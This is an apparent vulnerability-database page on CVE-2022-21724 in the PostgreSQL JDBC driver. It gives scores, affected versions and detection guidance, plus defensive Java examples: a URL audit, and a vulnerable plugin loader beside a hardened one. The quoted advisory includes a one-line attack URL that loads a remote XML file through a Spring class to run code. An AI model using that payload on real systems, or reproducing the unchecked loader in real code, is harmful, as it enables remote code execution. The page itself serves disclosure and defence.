CVE-2022-21724
Published: 2022-02-02
Priority: P2 · 60 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 3.01% (85.7th percentile)
pgjdbc is the official PostgreSQL JDBC Driver. A security hole was found in the JDBC driver for the PostgreSQL database during security research. A system using the PostgreSQL library can be attacked when an attacker controls the JDBC URL or properties. pgjdbc instantiates plugin instances based on class names provided via the `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory` and `sslpasswordcallback` connection properties. However, the driver did not verify that the class implements the expected interface before instantiating it. This can lead to code execution via arbitrarily loaded classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
Affected (9 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | libpgjava | < libpgjava 42.3.2-1 (bookworm) | libpgjava 42.3.2-1 (bookworm) |
| fedoraproject | fedora | — | — |
| postgresql | postgresql_jdbc_driver | < 42.2.25 | 42.2.25 |
| postgresql | postgresql_jdbc_driver | — | — |
| postgresql | postgresql_jdbc_driver | >= 42.3.0 < 42.3.2 | 42.3.2 |
| quarkus | quarkus | < 2.7.2 | 2.7.2 |
Detection & IOCs (extracted from sources)
- Attacker-controlled JDBC connection property `authenticationPluginClassName` can be used to instantiate arbitrary classes without interface verification, enabling code execution.
- Monitor JDBC URLs or connection properties for attacker-supplied class names in any of the five vulnerable properties: `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback`.
- Exploitation scope is local; focus detection on local process/application-level manipulation of JDBC connection strings or configuration files supplying plugin class names.
- Upstream re-scored this issue and it is no longer considered a full RCE; rated Moderate by Red Hat. Detection priority should be adjusted accordingly.
- Fixed in pgjdbc 42.3.2 (Debian sid/bookworm/trixie/forky) and 42.2.15-1+deb11u1 (Debian bullseye); environments still running older versions remain vulnerable.
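The monitoring item above (look for class names supplied through the five plugin properties) can be turned into a configuration audit. The Java below is an added example, not pgjdbc's code: it parses the query part of a `jdbc:postgresql` URL, merges in an explicit `Properties` object, and reports every occurrence of the five properties named in the advisory, marking values outside a deployment-specific allowlist for review. The allowlist, the class names and the sample URL are constructed for this demo; property names are matched case-insensitively so the audit errs on the side of reporting.

```java
import java.net.URI;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.Properties;
import java.util.Set;

/**
 * Added example, not pgjdbc's code: audit a JDBC URL and/or Properties object
 * for the five pgjdbc connection properties that resolve to a class name, and
 * flag any value outside a deployment-specific allowlist.
 */
public class PgJdbcPluginAudit {

    /** Properties named in the advisory, stored lower-case for case-insensitive matching. */
    static final Set<String> PLUGIN_PROPERTIES = Set.of(
        "authenticationpluginclassname", "sslhostnameverifier",
        "socketfactory", "sslfactory", "sslpasswordcallback");

    /** Constructed allowlist: plugin classes this deployment legitimately configures. */
    static final Set<String> ALLOWED_CLASSES = Set.of("com.example.db.CorporateSslFactory");

    /** One plugin property occurrence, with where it came from and whether it is allowlisted. */
    public record Finding(String source, String property, String className, boolean allowed) {
        @Override
        public String toString() {
            return (allowed ? "ok      " : "REVIEW  ") + source + ": " + property + "=" + className;
        }
    }

    /** Parse the query part of a jdbc:postgresql URL into key/value settings (URL-decoded). */
    static Map<String, String> settingsFromUrl(String jdbcUrl) {
        Map<String, String> settings = new LinkedHashMap<>();
        if (jdbcUrl == null || !jdbcUrl.startsWith("jdbc:")) return settings;
        // Strip the "jdbc:" prefix so java.net.URI can parse the remaining postgresql://... part
        URI uri = URI.create(jdbcUrl.substring("jdbc:".length()));
        String query = uri.getRawQuery();
        if (query == null) return settings;   // e.g. jdbc:postgresql:dbname has no query part
        for (String pair : query.split("&")) {
            if (pair.isEmpty()) continue;
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            settings.put(URLDecoder.decode(key, StandardCharsets.UTF_8),
                         URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return settings;
    }

    /** Report every plugin-property occurrence from both the URL and the Properties object. */
    static List<Finding> audit(String jdbcUrl, Properties props) {
        List<Finding> findings = new ArrayList<>();
        for (Map.Entry<String, String> e : settingsFromUrl(jdbcUrl).entrySet()) {
            check("url", e.getKey(), e.getValue(), findings);
        }
        if (props != null) {
            for (String key : props.stringPropertyNames()) {
                check("properties", key, props.getProperty(key), findings);
            }
        }
        return findings;
    }

    private static void check(String source, String key, String value, List<Finding> out) {
        if (PLUGIN_PROPERTIES.contains(key.toLowerCase(Locale.ROOT))) {
            out.add(new Finding(source, key, value, ALLOWED_CLASSES.contains(value)));
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: one allowlisted plugin, two unexpected class names, one unrelated property.
        String url = "jdbc:postgresql://db.internal:5432/app"
            + "?sslfactory=com.example.db.CorporateSslFactory"
            + "&socketFactory=com.example.NotAPlugin&socketFactoryArg=some-argument"
            + "&ApplicationName=billing";
        Properties props = new Properties();
        props.setProperty("authenticationPluginClassName", "com.example.AlsoNotAPlugin");

        for (Finding f : audit(url, props)) System.out.println(f);
    }
}
```

The audit reports occurrences rather than resolving precedence between URL and `Properties`, because for detection every place a class name enters the configuration is of interest. Running it against connection strings stored in configuration files or secrets stores gives an inventory of plugin classes that can be compared with what the deployment actually expects.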
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 7.0 | HIGH | — |
| vendor_redhat | — | 7.0 | HIGH | — |
OSV
CVE-2022-21724: pgjdbc is the official PostgreSQL JDBC Driver
osv · 2022-02-02 · CVSS 9.8 · CRITICAL
GHSA
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
ghsa · 2022-02-02 · HIGH · CWE-665
### Impact
pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
```
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
```
The first impacted version is REL9.4.1208 (it introduced the `socketFactory` connection property).
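The defect the advisory describes is a plugin loader that constructs whatever class the connection property names and only discovers at the cast that it is not a plugin, by which point the constructor has already run. The Java below is an added illustration, not pgjdbc's code (the driver's own fix is the commit listed in the references of this page): `SocketFactoryPlugin`, `LoggingSocketFactory` and `UnrelatedWorker` are hypothetical stand-ins, while the `socketFactory` and `socketFactoryArg` property names come from the advisory. It shows the unchecked loader beside a hardened one that resolves the class without initializing it, checks assignability to the expected type, and only then constructs it.

```java
import java.lang.reflect.Constructor;
import java.util.Properties;

/**
 * Added illustration, not pgjdbc's code. loadUnchecked mirrors the defect
 * class in the advisory (construct first, check type at the cast);
 * loadChecked verifies the expected type before any constructor runs.
 * Interface and class names are hypothetical.
 */
public class PluginLoaderDemo {

    /** Hypothetical plugin contract standing in for the driver's expected type. */
    public interface SocketFactoryPlugin {
        String describe();
    }

    /** A legitimate plugin: implements the contract and takes the *Arg string. */
    public static class LoggingSocketFactory implements SocketFactoryPlugin {
        private final String arg;
        public LoggingSocketFactory(String arg) { this.arg = arg; }
        public String describe() { return "LoggingSocketFactory(" + arg + ")"; }
    }

    /**
     * An unrelated class with a matching (String) constructor. Its constructor has an
     * observable side effect, standing in for any class that does work when constructed.
     */
    public static class UnrelatedWorker {
        static int constructions = 0;
        public UnrelatedWorker(String arg) { constructions++; }
    }

    /** Vulnerable pattern: instantiate first, discover the type mismatch at the cast. */
    static SocketFactoryPlugin loadUnchecked(String className, String arg) throws Exception {
        Class<?> cls = Class.forName(className);
        Constructor<?> ctor = cls.getConstructor(String.class);
        Object instance = ctor.newInstance(arg);        // side effects have already happened
        return (SocketFactoryPlugin) instance;          // ClassCastException comes too late
    }

    /** Hardened pattern: resolve without initializing, check assignability, then construct. */
    static <T> T loadChecked(Class<T> expected, String className, String arg) throws Exception {
        // initialize=false: static initializers of the named class do not run before the check
        Class<?> cls = Class.forName(className, false, PluginLoaderDemo.class.getClassLoader());
        if (!expected.isAssignableFrom(cls)) {
            throw new IllegalArgumentException(
                className + " does not implement " + expected.getName());
        }
        Constructor<? extends T> ctor = cls.asSubclass(expected).getConstructor(String.class);
        return ctor.newInstance(arg);
    }

    public static void main(String[] args) throws Exception {
        // Constructed connection properties, as the driver would derive them from a JDBC URL.
        Properties props = new Properties();
        props.setProperty("socketFactory", UnrelatedWorker.class.getName());
        props.setProperty("socketFactoryArg", "constructed-argument");
        String cls = props.getProperty("socketFactory");
        String arg = props.getProperty("socketFactoryArg");

        try {
            loadUnchecked(cls, arg);
        } catch (ClassCastException e) {
            System.out.println("unchecked: cast failed, but UnrelatedWorker was constructed "
                + UnrelatedWorker.constructions + " time(s)");
        }

        try {
            loadChecked(SocketFactoryPlugin.class, cls, arg);
        } catch (IllegalArgumentException e) {
            System.out.println("checked: rejected before construction: " + e.getMessage()
                + " (constructions still " + UnrelatedWorker.constructions + ")");
        }

        SocketFactoryPlugin ok = loadChecked(
            SocketFactoryPlugin.class, LoggingSocketFactory.class.getName(), "db.internal");
        System.out.println("checked: legitimate plugin loaded: " + ok.describe());
    }
}
```

The point of the hardened variant is ordering: the `isAssignableFrom` check runs on the `Class` object before `newInstance`, so a class that is not a plugin is never constructed, and `Class.forName(name, false, loader)` keeps its static initializers from running during the check as well. The plain cast in the unchecked variant provides no such protection because the constructor has already executed when the `ClassCastException` is raised.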
OSV
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
osv · 2022-02-02 · HIGH
Red Hat
jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes
vendor_redhat · 2022-02-01 · CVSS 7.0 · HIGH · CWE-665
Debian
CVE-2022-21724: libpgjava - pgjdbc is the official PostgreSQL JDBC Driver. A security hole was found in the j...
vendor_debian · 2022 · CVSS 7.0 · HIGH
Scope: local
bookworm: resolved (fixed in 42.3.2-1)
bullseye: resolved (fixed
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References
- https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
- https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
- https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/
- https://security.netapp.com/advisory/ntap-20220311-0005/
- https://www.debian.org/security/2022/dsa-5196